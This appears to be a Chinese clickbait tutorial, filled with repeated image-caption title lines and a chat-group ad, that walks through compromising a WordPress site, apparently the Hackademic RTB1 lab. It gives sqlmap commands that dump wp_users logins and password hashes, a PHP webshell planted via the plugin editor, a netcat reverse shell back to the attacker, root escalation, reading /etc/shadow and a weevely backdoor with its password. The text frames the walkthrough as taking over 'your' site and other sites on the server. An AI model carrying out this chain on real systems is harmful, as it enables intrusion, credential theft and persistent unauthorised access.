資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
image.png
加小編Python學習群:813542856即可自動獲取大量Python視訊教程以及各類PDF!
image.png
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
現在我們獲取了網站伺服器的IP地址為:173.236.138.113
尋找同一伺服器上的其它網站,我們使用sameip.org.
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
我們需要關於你網站的以下資訊:
- DNS records (A, NS, TXT, MX and SOA)
- Web Server Type (Apache, IIS, Tomcat)
- Registrar (the company that owns your domain)
- Your name, address, email and phone
- Scripts that your site uses (php, asp, asp.net, jsp, cfm)
- Your server OS (Unix,Linux,Windows,Solaris)
- Your server open ports to internet (80, 443, 21, etc.)
讓我們開始找你網站的DNS記錄,我們用who.is來完成這一目標.
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
我們發現你的DNS記錄如下
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
讓我們來確定web伺服器的型別
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
我們現在已經獲取了你的網站域名的註冊資訊,包括你的重要資訊等.
我們可以通過backtrack5中的whatweb來獲取你的網站伺服器作業系統型別和伺服器的版本.
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
我們發現你的網站使用了著名的php整站程式wordpress,伺服器的的系統型別為FedoraLinux,Web伺服器版本Apache 2.2.15.繼續檢視網站伺服器開放的埠,用滲透測試工具nmap:
1-Find services that run on server(檢視伺服器上執行的服務)
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
2-Find server OS(檢視作業系統版本)
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
我們也會用到Backtrack 5 R1中的W3AF 工具:
[email protected]:/pentest/web/w3af#./w3af_gui
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
我們輸入要檢測的網站地址,選擇完整的安全審計選項.
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
稍等一會,你將會看到掃描結果.
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
發現你的網站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.讓我們來探討SQL注入漏洞.
http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220
我們通過工具發現這個URL存在SQL注入,我們通過Sqlmap來檢測這個url.
Using sqlmap with –u url
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
過一會你會看到
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
輸入N按回車鍵繼續
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
我們發現你的網站存在mysql顯錯注入,mysql資料庫版本是5.0. 我們通過加入引數”-dbs”來嘗試採集資料庫名.
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
發現三個資料庫,接下來通過引數”-D wordpress -tables”來檢視wordpress資料庫的所有表名
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
通過引數“-T wp_users –columns ”來檢視wp_users表中的欄位.
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
接下來猜解欄位user_login和user_pass的值.用引數”-C user_login,user_pass–dump”
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
我們會發現使用者名稱和密碼hashes值. 我們需要通過以下線上破解網站來破解密碼hashes
http://www.onlinehashcrack.com/free-hash-reverse.php
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
登陸wordpress的後臺wp-admin
嘗試上傳php webshell到伺服器,以方便執行一些linux命令.在外掛頁面尋找任何可以編輯的外掛.我們選擇Textile這款外掛,編輯插入我們的php webshell,點選更新檔案,然後訪問我們的phpwebshell.
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
Phpwebshell被解析了,我們可以控制你網站的檔案,但是我們只希望獲得網站伺服器的root許可權,來入侵伺服器上其它的網站。
我們用NC來反彈一個shell,首先在我們的電腦上監聽5555埠.
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
然後在Php webshell上反向連線我們的電腦,輸入你的IP和埠5555.
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
點選連線我們會看到
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
接下來我們嘗試執行一些命令:
id
uid=48(apache) gid=489(apache) groups=489(apache)
(用來顯示使用者的id和組)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins
(顯示伺服器上當前的路徑)
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 721:41:45 EST 2009 i686 i686 i386 GNU/Linux
(顯示核心版本資訊)
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
執行完成之後我們輸入id命令
id
我們發現我們已經是root許可權了
uid=0(root) gid=0(root)
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
現在我們可以檢視/etc/shadow檔案
cat/etc/shadow
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
2.用weevely建立一個密碼為koko的php後門
[email protected]:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
接下來上傳到伺服器之後來使用它
[email protected]:/pentest/backdoors/web/weevely#./main.py -t -uhttp://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -pkoko
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
測試我們的hax.php後門
資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了
完成,撒花!